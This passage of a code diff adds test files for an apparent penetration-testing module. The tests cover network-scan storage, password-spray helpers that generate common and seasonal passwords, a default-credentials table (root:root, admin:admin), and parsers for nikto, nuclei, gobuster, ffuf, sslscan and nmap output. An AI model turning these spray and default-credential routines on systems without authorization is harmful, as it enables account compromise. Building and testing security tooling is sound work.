+      const profile = NetScanProfiles.get("standard")!
+      const formatted = NetScanProfiles.format(profile)
+
+      expect(formatted).toContain("Profile: Standard")
+      expect(formatted).toContain("Active Directory:")
+      expect(formatted).toContain("SMB:")
+    })
+
+    test("formatTable produces markdown table", () => {
+      const table = NetScanProfiles.formatTable()
+
+      expect(table).toContain("| Profile |")
+      expect(table).toContain("discovery")
+      expect(table).toContain("standard")
+      expect(table).toContain("thorough")
+    })
+  })
+})
+
+describe("NetScanStorage", () => {
+  beforeEach(() => {
+    NetScanStorage.clearMemory()
+  })
+
+  afterEach(() => {
+    NetScanStorage.clearMemory()
+  })
+
+  describe("scan operations", () => {
+    test("saves and retrieves scan result", async () => {
+      const scan: Omit<NetScanTypes.NetScanResult, "id"> = {
+        target: "192.168.1.0/24",
+        profile: "standard",
+        status: "completed",
+        hosts: [],
+        smbResults: [],
+        snmpResults: [],
+        dnsZones: [],
+        ldapResults: [],
+        credentials: [],
+        findings: ["SMB signing disabled on 3 hosts"],
+        stats: {
+          hostsDiscovered: 10,
+          hostsScanned: 10,
+          servicesDiscovered: 25,
+          servicesFound: 0,
+          credentialsFound: 0,
+          vulnerabilitiesFound: 0,
+          sharesFound: 5,
+          usersEnumerated: 50,
+          groupsEnumerated: 20,
+          credentialsTested: 100,
+          credentialsValid: 1,
+          findingsCount: 3,
+          criticalCount: 0,
+          highCount: 1,
+          mediumCount: 2,
+          lowCount: 0,
+          infoCount: 0,
+          duration: 5000,
+        },
+        startedAt: Date.now(),
+        completedAt: Date.now(),
+      }
+
+      const saved = await NetScanStorage.saveScan(scan, { storage: "memory" })
+      expect(saved.id).toMatch(/^netscan_/)
+
+      const retrieved = await NetScanStorage.getScan(saved.id, { storage: "memory" })
+      expect(retrieved).not.toBeNull()
+      expect(retrieved!.target).toBe("192.168.1.0/24")
+      expect(retrieved!.profile).toBe("standard")
+    })
+
+    test("lists scans with filters", async () => {
+      const scan1: Omit<NetScanTypes.NetScanResult, "id"> = {
+        target: "192.168.1.0/24",
+        profile: "quick",
+        status: "completed",
+        hosts: [],
+        smbResults: [],
+        snmpResults: [],
+        dnsZones: [],
+        ldapResults: [],
+        credentials: [],
+        findings: [],
+        stats: {
+          hostsDiscovered: 5,
+          hostsScanned: 5,
+          servicesDiscovered: 10,
+          servicesFound: 0,
+          credentialsFound: 0,
+          vulnerabilitiesFound: 0,
+          sharesFound: 0,
+          usersEnumerated: 0,
+          groupsEnumerated: 0,
+          credentialsTested: 0,
+          credentialsValid: 0,
+          findingsCount: 1,
+          criticalCount: 0,
+          highCount: 0,
+          mediumCount: 1,
+          lowCount: 0,
+          infoCount: 0,
+          duration: 1000,
+        },
+        startedAt: Date.now(),
+      }
+
+      const scan2: Omit<NetScanTypes.NetScanResult, "id"> = {
+        target: "10.0.0.0/24",
+        profile: "thorough",
+        status: "failed",
+        hosts: [],
+        smbResults: [],
+        snmpResults: [],
+        dnsZones: [],
+        ldapResults: [],
+        credentials: [],
+        findings: [],
+        stats: {
+          hostsDiscovered: 0,
+          hostsScanned: 0,
+          servicesDiscovered: 0,
+          servicesFound: 0,
+          credentialsFound: 0,
+          vulnerabilitiesFound: 0,
+          sharesFound: 0,
+          usersEnumerated: 0,
+          groupsEnumerated: 0,
+          credentialsTested: 0,
+          credentialsValid: 0,
+          findingsCount: 0,
+          criticalCount: 0,
+          highCount: 0,
+          mediumCount: 0,
+          lowCount: 0,
+          infoCount: 0,
+          duration: 0,
+        },
+        startedAt: Date.now() + 1000,
+      }
+
+      await NetScanStorage.saveScan(scan1, { storage: "memory" })
+      await NetScanStorage.saveScan(scan2, { storage: "memory" })
+
+      const all = await NetScanStorage.listScans({ storage: "memory" })
+      expect(all.length).toBe(2)
+
+      const quickOnly = await NetScanStorage.listScans({ storage: "memory" }, { profile: "quick" })
+      expect(quickOnly.length).toBe(1)
+
+      const completed = await NetScanStorage.listScans({ storage: "memory" }, { status: "completed" })
+      expect(completed.length).toBe(1)
+    })
+
+    test("deletes scan", async () => {
+      const scan: Omit<NetScanTypes.NetScanResult, "id"> = {
+        target: "192.168.1.0/24",
+        profile: "quick",
+        status: "completed",
+        hosts: [],
+        smbResults: [],
+        snmpResults: [],
+        dnsZones: [],
+        ldapResults: [],
+        credentials: [],
+        findings: [],
+        stats: {
+          hostsDiscovered: 5,
+          hostsScanned: 5,
+          servicesDiscovered: 10,
+          servicesFound: 0,
+          credentialsFound: 0,
+          vulnerabilitiesFound: 0,
+          sharesFound: 0,
+          usersEnumerated: 0,
+          groupsEnumerated: 0,
+          credentialsTested: 0,
+          credentialsValid: 0,
+          findingsCount: 0,
+          criticalCount: 0,
+          highCount: 0,
+          mediumCount: 0,
+          lowCount: 0,
+          infoCount: 0,
+          duration: 0,
+        },
+        startedAt: Date.now(),
+      }
+
+      const saved = await NetScanStorage.saveScan(scan, { storage: "memory" })
+      const deleted = await NetScanStorage.deleteScan(saved.id, { storage: "memory" })
+      expect(deleted).toBe(true)
+
+      const retrieved = await NetScanStorage.getScan(saved.id, { storage: "memory" })
+      expect(retrieved).toBeNull()
+    })
+  })
+
+  describe("host operations", () => {
+    test("saves and retrieves host", async () => {
+      const host: NetScanTypes.NetworkHost = {
+        ip: "192.168.1.10",
+        hostname: "DC01",
+        os: "Windows Server 2019",
+        services: [
+          { port: 445, protocol: "tcp", service: "smb", authenticated: false, vulnerabilities: [] },
+          { port: 389, protocol: "tcp", service: "ldap", authenticated: false, vulnerabilities: [] },
+        ],
+        discoveredAt: Date.now(),
+      }
+
+      const saved = await NetScanStorage.saveHost(host, { storage: "memory" })
+      expect(saved.ip).toBe("192.168.1.10")
+
+      const retrieved = await NetScanStorage.getHost("192.168.1.10", { storage: "memory" })
+      expect(retrieved).not.toBeNull()
+      expect(retrieved!.hostname).toBe("DC01")
+    })
+
+    test("lists hosts", async () => {
+      const host1: NetScanTypes.NetworkHost = {
+        ip: "192.168.1.10",
+        hostname: "DC01",
+        services: [],
+        discoveredAt: Date.now(),
+      }
+
+      const host2: NetScanTypes.NetworkHost = {
+        ip: "192.168.1.20",
+        hostname: "WEB01",
+        services: [],
+        discoveredAt: Date.now(),
+      }
+
+      await NetScanStorage.saveHost(host1, { storage: "memory" })
+      await NetScanStorage.saveHost(host2, { storage: "memory" })
+
+      const hosts = await NetScanStorage.listHosts({ storage: "memory" })
+      expect(hosts.length).toBe(2)
+    })
+  })
+
+  describe("credential operations", () => {
+    test("saves and retrieves credential", async () => {
+      const cred: NetScanTypes.CredentialResult = {
+        host: "192.168.1.10",
+        service: "smb",
+        port: 445,
+        username: "admin",
+        password: "Password123",
+        method: "spray",
+        valid: true,
+        admin: true,
+        timestamp: Date.now(),
+      }
+
+      const saved = await NetScanStorage.saveCredential(cred, { storage: "memory" })
+      expect(saved.username).toBe("admin")
+
+      const creds = await NetScanStorage.listCredentials({ storage: "memory" })
+      expect(creds.length).toBeGreaterThan(0)
+      expect(creds.some((c) => c.username === "admin")).toBe(true)
+    })
+
+    test("lists credentials after multiple saves", async () => {
+      // Clear memory first to ensure clean state
+      NetScanStorage.clearMemory()
+
+      const cred1: NetScanTypes.CredentialResult = {
+        host: "10.10.10.10",
+        service: "smb",
+        port: 445,
+        username: "testadmin",
+        method: "default",
+        valid: true,
+        admin: true,
+        timestamp: Date.now(),
+      }
+
+      await NetScanStorage.saveCredential(cred1, { storage: "memory" })
+
+      const creds = await NetScanStorage.listCredentials({ storage: "memory" })
+      expect(creds.length).toBeGreaterThanOrEqual(1)
+      expect(creds.some((c) => c.username === "testadmin")).toBe(true)
+    })
+  })
+
+  describe("memory management", () => {
+    test("clearMemory clears all buffers", async () => {
+      const scan: Omit<NetScanTypes.NetScanResult, "id"> = {
+        target: "192.168.1.0/24",
+        profile: "quick",
+        status: "completed",
+        hosts: [],
+        smbResults: [],
+        snmpResults: [],
+        dnsZones: [],
+        ldapResults: [],
+        credentials: [],
+        findings: [],
+        stats: {
+          hostsDiscovered: 0,
+          hostsScanned: 0,
+          servicesDiscovered: 0,
+          servicesFound: 0,
+          credentialsFound: 0,
+          vulnerabilitiesFound: 0,
+          sharesFound: 0,
+          usersEnumerated: 0,
+          groupsEnumerated: 0,
+          credentialsTested: 0,
+          credentialsValid: 0,
+          findingsCount: 0,
+          criticalCount: 0,
+          highCount: 0,
+          mediumCount: 0,
+          lowCount: 0,
+          infoCount: 0,
+          duration: 0,
+        },
+        startedAt: Date.now(),
+      }
+
+      const host: NetScanTypes.NetworkHost = {
+        ip: "192.168.1.10",
+        services: [],
+        discoveredAt: Date.now(),
+      }
+
+      await NetScanStorage.saveScan(scan, { storage: "memory" })
+      await NetScanStorage.saveHost(host, { storage: "memory" })
+
+      let counts = NetScanStorage.memoryCount()
+      expect(counts.scans).toBe(1)
+      expect(counts.hosts).toBe(1)
+
+      NetScanStorage.clearMemory()
+
+      counts = NetScanStorage.memoryCount()
+      expect(counts.scans).toBe(0)
+      expect(counts.hosts).toBe(0)
+    })
+  })
+})
+
+describe("NetScanTypes", () => {
+  test("validates Status", () => {
+    expect(NetScanTypes.Status.parse("pending")).toBe("pending")
+    expect(NetScanTypes.Status.parse("running")).toBe("running")
+    expect(NetScanTypes.Status.parse("completed")).toBe("completed")
+    expect(() => NetScanTypes.Status.parse("invalid")).toThrow()
+  })
+
+  test("validates ProfileId", () => {
+    expect(NetScanTypes.ProfileId.parse("discovery")).toBe("discovery")
+    expect(NetScanTypes.ProfileId.parse("standard")).toBe("standard")
+    expect(NetScanTypes.ProfileId.parse("thorough")).toBe("thorough")
+    expect(NetScanTypes.ProfileId.parse("ad-focused")).toBe("ad-focused")
+    expect(() => NetScanTypes.ProfileId.parse("nonexistent")).toThrow()
+  })
+
+  test("validates NetworkHost", () => {
+    const valid = NetScanTypes.NetworkHost.parse({
+      ip: "192.168.1.10",
+      hostname: "DC01",
+      services: [
+        { port: 445, protocol: "tcp", service: "smb" },
+      ],
+      discoveredAt: Date.now(),
+    })
+
+    expect(valid.ip).toBe("192.168.1.10")
+    expect(valid.hostname).toBe("DC01")
+  })
+
+  test("validates NetworkService", () => {
+    const valid = NetScanTypes.NetworkService.parse({
+      port: 445,
+      protocol: "tcp",
+      service: "smb",
+      version: "Windows 2019",
+    })
+
+    expect(valid.port).toBe(445)
+    expect(valid.protocol).toBe("tcp")
+  })
+
+  test("validates SMBShare", () => {
+    const valid = NetScanTypes.SMBShare.parse({
+      name: "ADMIN$",
+      type: "admin",
+      remark: "Remote Admin",
+      permissions: {
+        read: false,
+        write: false,
+        anonymous: false,
+      },
+    })
+
+    expect(valid.name).toBe("ADMIN$")
+    expect(valid.type).toBe("admin")
+  })
+
+  test("validates ADUser", () => {
+    const valid = NetScanTypes.ADUser.parse({
+      distinguishedName: "CN=john.doe,CN=Users,DC=corp,DC=local",
+      samAccountName: "john.doe",
+      userPrincipalName: "john.doe@corp.local",
+      enabled: true,
+      adminCount: false,
+      servicePrincipalNames: [],
+      dontRequirePreauth: false,
+    })
+
+    expect(valid.samAccountName).toBe("john.doe")
+    expect(valid.enabled).toBe(true)
+  })
+
+  test("validates CredentialResult", () => {
+    const valid = NetScanTypes.CredentialResult.parse({
+      host: "192.168.1.10",
+      service: "smb",
+      port: 445,
+      username: "admin",
+      password: "Password123",
+      method: "spray",
+      valid: true,
+      admin: true,
+      timestamp: Date.now(),
+    })
+
+    expect(valid.username).toBe("admin")
+    expect(valid.admin).toBe(true)
+  })
+})
+
+describe("PasswordSpray", () => {
+  describe("getCommonPasswords", () => {
+    test("returns common password list", () => {
+      const passwords = PasswordSpray.getCommonPasswords()
+
+      expect(passwords.length).toBeGreaterThan(0)
+      expect(passwords).toContain("Password1")
+      expect(passwords).toContain("Welcome1")
+    })
+
+    test("returns new array each time", () => {
+      const passwords1 = PasswordSpray.getCommonPasswords()
+      const passwords2 = PasswordSpray.getCommonPasswords()
+
+      expect(passwords1).not.toBe(passwords2)
+      expect(passwords1).toEqual(passwords2)
+    })
+  })
+
+  describe("generateSeasonalPasswords", () => {
+    test("generates seasonal passwords for current year", () => {
+      const passwords = PasswordSpray.generateSeasonalPasswords()
+      const year = new Date().getFullYear()
+
+      expect(passwords.some((p) => p.includes(`Spring${year}`))).toBe(true)
+      expect(passwords.some((p) => p.includes(`Summer${year}`))).toBe(true)
+      expect(passwords.some((p) => p.includes(`Fall${year}`))).toBe(true)
+      expect(passwords.some((p) => p.includes(`Winter${year}`))).toBe(true)
+    })
+
+    test("generates seasonal passwords for specific year", () => {
+      const passwords = PasswordSpray.generateSeasonalPasswords(2024)
+
+      expect(passwords.some((p) => p.includes("Spring2024"))).toBe(true)
+      expect(passwords.some((p) => p.includes("Summer2024"))).toBe(true)
+    })
+
+    test("includes variations with exclamation marks", () => {
+      const passwords = PasswordSpray.generateSeasonalPasswords(2024)
+
+      expect(passwords.some((p) => p === "Spring2024!")).toBe(true)
+      expect(passwords.some((p) => p === "Summer2024!")).toBe(true)
+    })
+  })
+
+  describe("formatResults", () => {
+    test("formats spray results correctly", () => {
+      const result = {
+        target: {
+          host: "192.168.1.10",
+          port: 445,
+          service: "smb",
+        },
+        tested: 100,
+        valid: [
+          {
+            id: "cred_1",
+            host: "192.168.1.10",
+            service: "smb" as const,
+            port: 445,
+            username: "admin",
+            password: "Password1",
+            method: "spray" as const,
+            valid: true,
+            admin: true,
+            timestamp: Date.now(),
+          },
+        ],
+        locked: ["user1", "user2"],
+        findings: ["Tested 100 combinations", "Found 1 valid credentials"],
+      }
+
+      const formatted = PasswordSpray.formatResults(result)
+
+      expect(formatted).toContain("Password Spray Results")
+      expect(formatted).toContain("192.168.1.10")
+      expect(formatted).toContain("Valid Credentials:")
+      expect(formatted).toContain("admin:Password1")
+      expect(formatted).toContain("Locked Accounts:")
+    })
+
+    test("handles empty results", () => {
+      const result = {
+        target: {
+          host: "192.168.1.10",
+          port: 445,
+          service: "smb",
+        },
+        tested: 50,
+        valid: [],
+        locked: [],
+        findings: ["Tested 50 combinations", "Found 0 valid credentials"],
+      }
+
+      const formatted = PasswordSpray.formatResults(result)
+
+      expect(formatted).toContain("Password Spray Results")
+      expect(formatted).not.toContain("Valid Credentials:")
+      expect(formatted).not.toContain("Locked Accounts:")
+    })
+  })
+})
+
+describe("DEFAULT_CREDENTIALS", () => {
+  test("has credentials for common services", () => {
+    const services = Object.keys(DEFAULT_CREDENTIALS)
+    expect(services.length).toBeGreaterThan(0)
+    expect(services).toContain("ssh")
+    expect(services).toContain("ftp")
+    expect(services).toContain("mysql")
+  })
+
+  test("credentials have required fields", () => {
+    for (const service of Object.keys(DEFAULT_CREDENTIALS)) {
+      const creds = DEFAULT_CREDENTIALS[service]
+      expect(Array.isArray(creds)).toBe(true)
+      for (const cred of creds) {
+        expect(cred.username).toBeDefined()
+        expect(cred.password).toBeDefined()
+      }
+    }
+  })
+
+  test("includes common default credentials", () => {
+    const sshCreds = DEFAULT_CREDENTIALS.ssh || []
+    expect(sshCreds.some((c) => c.username === "root" && c.password === "root")).toBe(true)
+
+    const smbCreds = DEFAULT_CREDENTIALS.smb || []
+    expect(smbCreds.some((c) => c.username === "admin" && c.password === "admin")).toBe(true)
+  })
+})
diff --git a/packages/opencode/test/pentest/parsers.test.ts b/packages/opencode/test/pentest/parsers.test.ts
new file mode 100644
index 00000000000..63fca26f3ad
--- /dev/null
+++ b/packages/opencode/test/pentest/parsers.test.ts
@@ -0,0 +1,407 @@
+/**
+ * @fileoverview Parser Tests
+ *
+ * Tests for security tool output parsers.
+ */
+
+import { describe, test, expect } from "bun:test"
+import { NiktoParser } from "../../src/pentest/parsers/nikto"
+import { NucleiParser } from "../../src/pentest/parsers/nuclei"
+import { GobusterParser } from "../../src/pentest/parsers/gobuster"
+import { FfufParser } from "../../src/pentest/parsers/ffuf"
+import { SslscanParser } from "../../src/pentest/parsers/sslscan"
+
+describe("NiktoParser", () => {
+  test("parses text output", () => {
+    const output = `
++ Target IP:          192.168.1.1
++ Target Hostname:    example.com
++ Target Port:        80
++ Server: Apache/2.4.41 (Ubuntu)
++ /admin/: Directory indexing found.
++ OSVDB-3092: /admin/: This might be interesting...
++ /config.php: PHP Config file detected.
+`
+    const result = NiktoParser.parse(output, "http://example.com")
+
+    expect(result.host).toBe("example.com")
+    expect(result.ip).toBe("192.168.1.1")
+    expect(result.port).toBe(80)
+    expect(result.banner).toBe("Apache/2.4.41 (Ubuntu)")
+    expect(result.findings.length).toBeGreaterThan(0)
+  })
+
+  test("parses JSON output", () => {
+    const json = JSON.stringify({
+      host: "example.com",
+      ip: "192.168.1.1",
+      port: 443,
+      banner: "nginx/1.18.0",
+      vulnerabilities: [
+        { id: "1", OSVDB: "3092", url: "/admin/", msg: "Admin directory found" },
+        { id: "2", url: "/backup/", msg: "Backup directory found" },
+      ],
+    })
+
+    const result = NiktoParser.parse(json, "https://example.com")
+
+    expect(result.host).toBe("example.com")
+    expect(result.port).toBe(443)
+    expect(result.findings.length).toBe(2)
+    expect(result.findings[0].OSVDB).toBe("3092")
+  })
+
+  test("formats output correctly", () => {
+    const result = NiktoParser.parse("+ Target Hostname: test.com\n+ OSVDB-123: /admin/: Admin found", "http://test.com")
+    const formatted = NiktoParser.format(result)
+
+    expect(formatted).toContain("Nikto Scan Results")
+    expect(formatted).toContain("test.com")
+    expect(formatted).toContain("FINDINGS")
+  })
+
+  test("generates findings with severity", () => {
+    const output = `
++ OSVDB-3092: /admin/: Admin directory found
++ /config.php: SQL injection possible
+`
+    const result = NiktoParser.parse(output, "http://example.com")
+    const findings = NiktoParser.toFindings(result, "session_1", "scan_1")
+
+    expect(findings.length).toBeGreaterThan(0)
+    expect(findings[0].sessionID).toBe("session_1")
+    expect(findings[0].scanID).toBe("scan_1")
+  })
+
+  test("summarizes results", () => {
+    const output = "+ OSVDB-1: Finding 1\n+ OSVDB-2: Finding 2"
+    const result = NiktoParser.parse(output, "http://example.com")
+    const summary = NiktoParser.summarize(result)
+
+    expect(summary).toContain("Nikto found")
+    expect(summary).toContain("OSVDB")
+  })
+})
+
+describe("NucleiParser", () => {
+  test("parses JSONL output", () => {
+    const jsonl = [
+      JSON.stringify({
+        "template-id": "cve-2021-44228",
+        info: { name: "Log4j RCE", severity: "critical", description: "Log4Shell vulnerability" },
+        type: "http",
+        host: "https://example.com",
+        "matched-at": "https://example.com/api",
+        timestamp: "2024-01-01T00:00:00Z",
+      }),
+      JSON.stringify({
+        "template-id": "tech-detect",
+        info: { name: "Apache Detected", severity: "info" },
+        type: "http",
+        host: "https://example.com",
+        timestamp: "2024-01-01T00:00:01Z",
+      }),
+    ].join("\n")
+
+    const result = NucleiParser.parse(jsonl, "https://example.com")
+
+    expect(result.findings.length).toBe(2)
+    expect(result.summary.critical).toBe(1)
+    expect(result.summary.info).toBe(1)
+    expect(result.summary.total).toBe(2)
+  })
+
+  test("formats output with severity grouping", () => {
+    const jsonl = JSON.stringify({
+      "template-id": "test",
+      info: { name: "Test Finding", severity: "high" },
+      type: "http",
+      host: "https://example.com",
+      timestamp: "2024-01-01T00:00:00Z",
+    })
+
+    const result = NucleiParser.parse(jsonl, "https://example.com")
+    const formatted = NucleiParser.format(result)
+
+    expect(formatted).toContain("Nuclei Scan Results")
+    expect(formatted).toContain("SEVERITY SUMMARY")
+    expect(formatted).toContain("HIGH")
+  })
+
+  test("generates findings with CVE references", () => {
+    const jsonl = JSON.stringify({
+      "template-id": "cve-2021-44228",
+      info: {
+        name: "Log4Shell",
+        severity: "critical",
+        classification: { "cve-id": ["CVE-2021-44228"] },
+      },
+      type: "http",
+      host: "https://example.com",
+      timestamp: "2024-01-01T00:00:00Z",
+    })
+
+    const result = NucleiParser.parse(jsonl, "https://example.com")
+    const findings = NucleiParser.toFindings(result, "session_1", "scan_1")
+
+    expect(findings[0].cve).toContain("CVE-2021-44228")
+    expect(findings[0].severity).toBe("critical")
+  })
+
+  test("summarizes with severity counts", () => {
+    const jsonl = [
+      JSON.stringify({ "template-id": "a", info: { name: "A", severity: "critical" }, type: "http", host: "h", timestamp: "2024-01-01T00:00:00Z" }),
+      JSON.stringify({ "template-id": "b", info: { name: "B", severity: "high" }, type: "http", host: "h", timestamp: "2024-01-01T00:00:00Z" }),
+    ].join("\n")
+
+    const result = NucleiParser.parse(jsonl, "h")
+    const summary = NucleiParser.summarize(result)
+
+    expect(summary).toContain("2 issue(s)")
+    expect(summary).toContain("1 critical")
+    expect(summary).toContain("1 high")
+  })
+})
+
+describe("GobusterParser", () => {
+  test("parses text output", () => {
+    const output = `
+/admin                (Status: 200) [Size: 1234]
+/backup               (Status: 403) [Size: 564]
+/config               (Status: 301) [Size: 312]
+`
+    const result = GobusterParser.parse(output, "http://example.com", "dir")
+
+    expect(result.entries.length).toBe(3)
+    expect(result.entries[0].path).toBe("/admin")
+    expect(result.entries[0].status).toBe(200)
+    expect(result.entries[0].size).toBe(1234)
+    expect(result.entries[1].status).toBe(403)
+  })
+
+  test("parses JSON output", () => {
+    const json = JSON.stringify([
+      { path: "/admin", status: 200, size: 1234 },
+      { path: "/api", status: 200, size: 5678 },
+    ])
+
+    const result = GobusterParser.parse(json, "http://example.com", "dir")
+
+    expect(result.entries.length).toBe(2)
+    expect(result.mode).toBe("dir")
+  })
+
+  test("formats output with status grouping", () => {
+    const output = "/admin (Status: 200) [Size: 100]\n/secret (Status: 403) [Size: 50]"
+    const result = GobusterParser.parse(output, "http://example.com", "dir")
+    const formatted = GobusterParser.format(result)
+
+    expect(formatted).toContain("Gobuster DIR Results")
+    expect(formatted).toContain("OK (200)")
+    expect(formatted).toContain("Forbidden (403)")
+  })
+
+  test("generates findings for sensitive paths", () => {
+    const output = `
+/admin                (Status: 200) [Size: 1234]
+/.git/config          (Status: 200) [Size: 564]
+/backup.sql           (Status: 200) [Size: 10000]
+/normal               (Status: 200) [Size: 100]
+`
+    const result = GobusterParser.parse(output, "http://example.com", "dir")
+    const findings = GobusterParser.toFindings(result, "session_1", "scan_1")
+
+    // Should flag admin, .git, and .sql but not normal
+    expect(findings.length).toBe(3)
+    expect(findings.some(f => f.title.includes(".git"))).toBe(true)
+    expect(findings.some(f => f.severity === "critical")).toBe(true) // .git
+    expect(findings.some(f => f.severity === "high")).toBe(true) // .sql
+  })
+
+  test("summarizes results", () => {
+    const output = "/a (Status: 200)\n/b (Status: 200)\n/c (Status: 403)"
+    const result = GobusterParser.parse(output, "http://example.com", "dir")
+    const summary = GobusterParser.summarize(result)
+
+    expect(summary).toContain("3 path(s)")
+    expect(summary).toContain("2 accessible")
+    expect(summary).toContain("1 forbidden")
+  })
+})
+
+describe("FfufParser", () => {
+  test("parses JSON output", () => {
+    const json = JSON.stringify({
+      results: [
+        { url: "http://example.com/admin", status: 200, length: 1234, words: 100, lines: 50 },
+        { url: "http://example.com/api", status: 200, length: 5678, words: 200, lines: 100 },
+      ],
+      config: {
+        url: "http://example.com/FUZZ",
+        method: "GET",
+      },
+    })
+
+    const result = FfufParser.parse(json, "http://example.com")
+
+    expect(result.results.length).toBe(2)
+    expect(result.results[0].url).toBe("http://example.com/admin")
+    expect(result.results[0].status).toBe(200)
+  })
+
+  test("parses text output", () => {
+    const output = `
+http://example.com/admin     [Status: 200, Size: 1234, Words: 100, Lines: 50]
+http://example.com/api       [Status: 200, Size: 5678, Words: 200, Lines: 100]
+`
+    const result = FfufParser.parse(output, "http://example.com")
+
+    expect(result.results.length).toBe(2)
+  })
+
+  test("formats output with grouping", () => {
+    const json = JSON.stringify({
+      results: [
+        { url: "http://example.com/admin", status: 200, length: 100, words: 10, lines: 5 },
+      ],
+    })
+    const result = FfufParser.parse(json, "http://example.com")
+    const formatted = FfufParser.format(result)
+
+    expect(formatted).toContain("FFuf Fuzzing Results")
+    expect(formatted).toContain("Status 200")
+  })
+
+  test("generates findings for sensitive paths", () => {
+    const json = JSON.stringify({
+      results: [
+        { url: "http://example.com/.git/config", status: 200, length: 100, words: 10, lines: 5 },
+        { url: "http://example.com/admin", status: 200, length: 200, words: 20, lines: 10 },
+        { url: "http://example.com/normal", status: 200, length: 300, words: 30, lines: 15 },
+      ],
+    })
+    const result = FfufParser.parse(json, "http://example.com")
+    const findings = FfufParser.toFindings(result, "session_1", "scan_1")
+
+    expect(findings.length).toBe(2) // .git and admin, not normal
+    expect(findings.some(f => f.severity === "critical")).toBe(true)
+  })
+
+  test("summarizes results", () => {
+    const json = JSON.stringify({
+      results: [
+        { url: "a", status: 200, length: 1, words: 1, lines: 1 },
+        { url: "b", status: 404, length: 1, words: 1, lines: 1 },
+      ],
+    })
+    const result = FfufParser.parse(json, "http://example.com")
+    const summary = FfufParser.summarize(result)
+
+    expect(summary).toContain("2 result(s)")
+    expect(summary).toContain("1 interesting")
+  })
+})
+
+describe("SslscanParser", () => {
+  test("parses text output", () => {
+    const output = `
+Testing SSL server example.com on port 443
+  SSLv2     disabled
+  SSLv3     disabled
+  TLSv1.0   enabled
+  TLSv1.1   disabled
+  TLSv1.2   enabled
+  TLSv1.3   enabled
+
+  Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384
+  Preferred TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384
+  Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256
+`
+    const result = SslscanParser.parse(output, "example.com")
+
+    expect(result.host).toBe("example.com")
+    expect(result.port).toBe(443)
+    expect(result.protocols.length).toBeGreaterThan(0)
+    expect(result.ciphers.length).toBe(3)
+  })
+
+  test("detects deprecated protocols", () => {
+    const output = `
+Testing SSL server example.com on port 443
+  SSLv3     enabled
+  TLSv1.0   enabled
+  TLSv1.2   enabled
+`
+    const result = SslscanParser.parse(output, "example.com")
+
+    expect(result.protocols.find(p => p.version === "3.0")?.enabled).toBe(true)
+    expect(result.protocols.find(p => p.version === "1.0")?.enabled).toBe(true)
+  })
+
+  test("formats output with warnings", () => {
+    const output = `
+Testing SSL server example.com on port 443
+  SSLv3     enabled
+  TLSv1.2   enabled
+`
+    const result = SslscanParser.parse(output, "example.com")
+    const formatted = SslscanParser.format(result)
+
+    expect(formatted).toContain("SSL/TLS Scan Results")
+    expect(formatted).toContain("PROTOCOL SUPPORT")
+    expect(formatted).toContain("⚠️") // Warning for deprecated protocol
+  })
+
+  test("generates findings for security issues", () => {
+    const output = `
+Testing SSL server example.com on port 443
+  SSLv3     enabled
+  TLSv1.0   enabled
+  TLSv1.2   enabled
+
+Heartbleed vulnerable
+`
+    const result = SslscanParser.parse(output, "example.com")
+
+    // Manually set heartbleed for test
+    result.vulnerabilities = { heartbleed: true }
+
+    const findings = SslscanParser.toFindings(result, "session_1", "scan_1")
+
+    expect(findings.length).toBeGreaterThan(0)
+    // Should have findings for deprecated protocols and heartbleed
+    expect(findings.some(f => f.title.includes("Deprecated"))).toBe(true)
+    expect(findings.some(f => f.title.includes("Heartbleed"))).toBe(true)
+    expect(findings.some(f => f.severity === "critical")).toBe(true)
+  })
+
+  test("detects weak ciphers", () => {
+    const output = `
+Testing SSL server example.com on port 443
+  TLSv1.2   enabled
+
+  Accepted  TLSv1.2  128 bits  RC4-SHA
+  Accepted  TLSv1.2  56 bits   DES-CBC3-SHA
+  Accepted  TLSv1.2  256 bits  AES256-GCM-SHA384
+`
+    const result = SslscanParser.parse(output, "example.com")
+
+    const weakCiphers = result.ciphers.filter(c => c.strength === "weak" || c.strength === "insecure")
+    expect(weakCiphers.length).toBeGreaterThan(0)
+  })
+
+  test("summarizes security issues", () => {
+    const output = `
+Testing SSL server example.com on port 443
+  SSLv3     enabled
+  TLSv1.2   enabled
+
+  Accepted  TLSv1.2  56 bits   DES-CBC3-SHA
+`
+    const result = SslscanParser.parse(output, "example.com")
+    const summary = SslscanParser.summarize(result)
+
+    expect(summary).toContain("issues")
+    expect(summary).toContain("deprecated protocol")
+  })
+})
diff --git a/packages/opencode/test/pentest/pentest.test.ts b/packages/opencode/test/pentest/pentest.test.ts
new file mode 100644
index 00000000000..1da50f7555d
--- /dev/null
+++ b/packages/opencode/test/pentest/pentest.test.ts
@@ -0,0 +1,526 @@
+/**
+ * Pentest Module Tests
+ *
+ * Tests for the penetration testing module including:
+ * - Nmap XML parser
+ * - Findings storage
+ * - Type validation
+ */
+
+import { test, expect, describe, beforeEach } from "bun:test"
+import { NmapParser } from "../../src/pentest/nmap-parser"
+import { Findings } from "../../src/pentest/findings"
+import { PentestTypes } from "../../src/pentest/types"
+
+// Sample nmap XML output for testing
+const SAMPLE_NMAP_XML = `<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE nmaprun>
+<nmaprun scanner="nmap" args="nmap -sV -oX - 192.168.1.1" start="1700000000" startstr="Wed Nov 15 00:00:00 2023" version="7.94" xmloutputversion="1.05">
+<host starttime="1700000001" endtime="1700000010">
+<status state="up" reason="echo-reply" reason_ttl="64"/>
+<address addr="192.168.1.1" addrtype="ipv4"/>
+<hostnames>
+<hostname name="router.local" type="PTR"/>
+</hostnames>
+<ports>
+<port protocol="tcp" portid="22">
+<state state="open" reason="syn-ack" reason_ttl="64"/>
+<service name="ssh" product="OpenSSH" version="8.9p1" extrainfo="Ubuntu" method="probed" conf="10"/>
+</port>
+<port protocol="tcp" portid="80">
+<state state="open" reason="syn-ack" reason_ttl="64"/>
+<service name="http" product="nginx" version="1.18.0" method="probed" conf="10"/>
+</port>
+<port protocol="tcp" portid="443">
+<state state="open" reason="syn-ack" reason_ttl="64"/>
+<service name="https" product="nginx" version="1.18.0" method="probed" conf="10"/>
+</port>
+<port protocol="tcp" portid="23">
+<state state="open" reason="syn-ack" reason_ttl="64"/>
+<service name="telnet" method="probed" conf="10"/>
+</port>
+</ports>
+</host>
+<runstats>
+<finished time="1700000015" timestr="Wed Nov 15 00:00:15 2023" summary="Nmap done" elapsed="15.00" exit="success"/>
+</runstats>
